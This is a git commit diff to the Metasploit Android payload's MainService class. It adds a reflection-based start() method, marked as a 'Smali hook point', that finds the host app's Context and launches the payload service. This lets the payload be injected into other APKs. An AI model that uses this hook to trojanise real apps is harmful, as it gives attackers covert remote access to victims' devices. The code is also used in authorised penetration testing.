add a simpler smali injection function

2025-01-02 11:36:22 +01:00 · 2017-01-19 14:45:10 +07:00 · 2017-01-19 14:45:10 +07:00 · 80e8083e23
commit 80e8083e23
parent a35889aff5
1 changed files with 52 additions and 1 deletions
--- a/java/androidpayload/app/src/com/metasploit/stage/MainService.java
+++ b/java/androidpayload/app/src/com/metasploit/stage/MainService.java
@ -1,13 +1,64 @@
 package com.metasploit.stage;

-import android.app.ActivityManager;
 import android.app.Service;
 import android.content.Context;
 import android.content.Intent;
+import android.os.Handler;
 import android.os.IBinder;
+import android.os.Looper;
+
+import java.lang.reflect.Method;

 public class MainService extends Service {

+    private static final Object contextWaiter = new Object();
+    private static Context context;
+
+    private static void findContext() throws Exception {
+        Class<?> activityThreadClass;
+        try {
+            activityThreadClass = Class.forName("android.app.ActivityThread");
+        } catch (ClassNotFoundException e) {
+            // No context
+            return;
+        }
+        final Method currentApplication = activityThreadClass.getMethod("currentApplication");
+        context = (Context) currentApplication.invoke(null, (Object[]) null);
+        if (context == null) {
+            // Post to the UI/Main thread and try and retrieve the Context
+            final Handler handler = new Handler(Looper.getMainLooper());
+            handler.post(new Runnable() {
+                public void run() {
+                    synchronized (contextWaiter) {
+                        try {
+                            context = (Context) currentApplication.invoke(null, (Object[]) null);
+                        } catch (Exception e) {
+                            e.printStackTrace();
+                        }
+                        contextWaiter.notify();
+                    }
+                }
+            });
+            synchronized (contextWaiter) {
+                if (context == null) {
+                    contextWaiter.wait(100);
+                }
+            }
+        }
+    }
+
+    // Smali hook point
+    public static void start() {
+        try {
+            findContext();
+        } catch (Exception e) {
+
+        }
+        if (context != null) {
+            startService(context);
+        }
+    }
+
    public static void startService(Context context) {
        context.startService(new Intent(context, MainService.class));
    }